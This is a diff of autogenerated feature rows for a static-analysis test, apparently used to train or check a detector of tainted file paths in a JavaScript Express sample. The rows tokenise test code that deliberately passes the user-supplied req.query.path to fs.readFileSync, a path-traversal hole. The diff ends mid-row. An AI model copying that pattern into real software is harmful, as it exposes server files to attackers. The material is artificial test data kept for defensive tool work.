autogenerated/TaintedPath/normalizedPaths.js:2:23:2:31 | 'express' | calleeImports | | | autogenerated/TaintedPath/normalizedPaths.js:2:23:2:31 | 'express' | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:2:23:2:31 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:2:23:2:31 | 'express' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:3:5:3:7 | url | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:3:5:3:7 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:3:5:3:7 | url | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:3:5:3:24 | url = require('url') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:3:5:3:24 | url = require('url') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:3:5:3:24 | url = require('url') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:3:11:3:17 | require | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:3:11:3:17 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:3:11:3:17 | require | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:3:11:3:24 | exceptional return of require('url') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:3:11:3:24 | exceptional return of require('url') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:3:11:3:24 | exceptional return of require('url') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:3:11:3:24 | require('url') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:3:11:3:24 | require('url') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:3:11:3:24 | require('url') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:3:19:3:23 | 'url' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/normalizedPaths.js:3:19:3:23 | 'url' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:3:19:3:23 | 'url' | calleeImports | | | autogenerated/TaintedPath/normalizedPaths.js:3:19:3:23 | 'url' | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:3:19:3:23 | 'url' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:3:19:3:23 | 'url' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:4:5:4:12 | sanitize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:4:5:4:12 | sanitize | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:4:5:4:12 | sanitize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:4:5:4:43 | sanitiz ... ename') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:4:5:4:43 | sanitiz ... ename') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:4:5:4:43 | sanitiz ... ename') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:4:16:4:22 | require | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:4:16:4:22 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:4:16:4:22 | require | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:4:16:4:43 | exceptional return of require ... ename') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:4:16:4:43 | exceptional return of require ... ename') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:4:16:4:43 | exceptional return of require ... ename') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:4:16:4:43 | require ... ename') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:4:16:4:43 | require ... ename') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:4:16:4:43 | require ... ename') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:4:24:4:42 | 'sanitize-filename' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/normalizedPaths.js:4:24:4:42 | 'sanitize-filename' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:4:24:4:42 | 'sanitize-filename' | calleeImports | | | autogenerated/TaintedPath/normalizedPaths.js:4:24:4:42 | 'sanitize-filename' | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:4:24:4:42 | 'sanitize-filename' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:4:24:4:42 | 'sanitize-filename' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:5:5:5:14 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:5:5:5:14 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:5:5:5:14 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:5:5:5:14 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:5:5:5:32 | pathMod ... 'path') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:5:5:5:32 | pathMod ... 'path') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:5:5:5:32 | pathMod ... 'path') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:5:5:5:32 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:5:5:5:32 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:5:5:5:32 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:5:18:5:24 | require | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:5:18:5:24 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:5:18:5:24 | require | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:5:18:5:32 | exceptional return of require('path') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:5:18:5:32 | exceptional return of require('path') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:5:18:5:32 | exceptional return of require('path') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:5:18:5:32 | require('path') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:5:18:5:32 | require('path') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:5:18:5:32 | require('path') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:5:26:5:31 | 'path' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/normalizedPaths.js:5:26:5:31 | 'path' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:5:26:5:31 | 'path' | calleeImports | | | autogenerated/TaintedPath/normalizedPaths.js:5:26:5:31 | 'path' | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:5:26:5:31 | 'path' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:5:26:5:31 | 'path' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:8:5:8:7 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:8:5:8:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:8:5:8:7 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:8:5:8:19 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:8:5:8:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:8:5:8:19 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:8:5:8:19 | app = express() | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:8:5:8:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:8:5:8:19 | app = express() | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:8:11:8:17 | express | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:8:11:8:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:8:11:8:17 | express | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:8:11:8:19 | exceptional return of express() | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:8:11:8:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:8:11:8:19 | exceptional return of express() | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:8:11:8:19 | express() | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:8:11:8:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:8:11:8:19 | express() | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:10:1:10:3 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:10:1:10:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:10:1:10:3 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:10:1:10:7 | app.get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:10:1:10:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:10:1:10:7 | app.get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:10:1:18:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:10:1:18:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:10:1:18:2 | app.get ... T OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:10:1:18:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:10:1:18:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:10:1:18:2 | exceptional return of app.get ... T OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:10:5:10:7 | get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:10:5:10:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:10:5:10:7 | get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:10:9:10:16 | '/basic' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:10:9:10:16 | '/basic' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:10:9:10:16 | '/basic' | calleeImports | express | @@ -7431,6 +69434,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:10:9:10:16 | '/basic' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:10:9:10:16 | '/basic' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:10:9:10:16 | '/basic' | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:10:18 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:10:18 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:10:18 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:10:18 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:10:18 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:10:18 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:10:18 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:10:18 | pathModule | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:10:18 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:10:18 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:18:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:18:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:18:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:18:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:18:1 | 'arguments' object of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:10:19:18:1 | (req, r ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:10:19:18:1 | (req, r ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:10:19:18:1 | (req, r ... OT OK\\n} | calleeImports | express | @@ -7438,6 +69456,96 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:10:19:18:1 | (req, r ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:10:19:18:1 | (req, r ... OT OK\\n} | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:10:19:18:1 | (req, r ... OT OK\\n} | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:18:1 | exceptional return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:18:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:18:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:18:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:18:1 | exceptional return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:18:1 | return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:18:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:18:1 | return of anonymous function | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:18:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:10:19:18:1 | return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:10:20:10:22 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:10:20:10:22 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:10:20:10:22 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:10:20:10:22 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:10:20:10:22 | req | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:10:20:10:22 | req | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:10:20:10:22 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:10:20:10:22 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:10:20:10:22 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:10:20:10:22 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:10:25:10:27 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:10:25:10:27 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:10:25:10:27 | res | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:10:25:10:27 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:10:25:10:27 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:11:7:11:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:11:7:11:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:11:7:11:10 | path | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:11:7:11:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:11:7:11:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:11:7:11:27 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:11:7:11:27 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:11:7:11:27 | path | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:11:7:11:27 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:11:7:11:27 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:11:7:11:27 | path = ... ry.path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:11:7:11:27 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:11:7:11:27 | path = ... ry.path | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:11:7:11:27 | path = ... ry.path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:11:7:11:27 | path = ... ry.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:11:14:11:16 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:11:14:11:16 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:11:14:11:16 | req | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:11:14:11:16 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:11:14:11:16 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:11:14:11:22 | req.query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:11:14:11:22 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:11:14:11:22 | req.query | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:11:14:11:22 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:11:14:11:22 | req.query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:11:14:11:27 | req.query.path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:11:14:11:27 | req.query.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:11:14:11:27 | req.query.path | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:11:14:11:27 | req.query.path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:11:14:11:27 | req.query.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:11:18:11:22 | query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:11:18:11:22 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:11:18:11:22 | query | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:11:18:11:22 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:11:18:11:22 | query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:11:24:11:27 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:11:24:11:27 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:11:24:11:27 | path | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:11:24:11:27 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:11:24:11:27 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:13:3:13:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:13:3:13:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:13:3:13:4 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:13:3:13:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:13:3:13:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:13:3:13:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:13:3:13:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:13:3:13:17 | fs.readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:13:3:13:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:13:3:13:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:13:3:13:23 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:13:3:13:23 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:13:3:13:23 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:13:3:13:23 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:13:3:13:23 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:13:3:13:23 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:13:3:13:23 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:13:3:13:23 | fs.read ... c(path) | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:13:3:13:23 | fs.read ... c(path) | enclosingFunctionName | 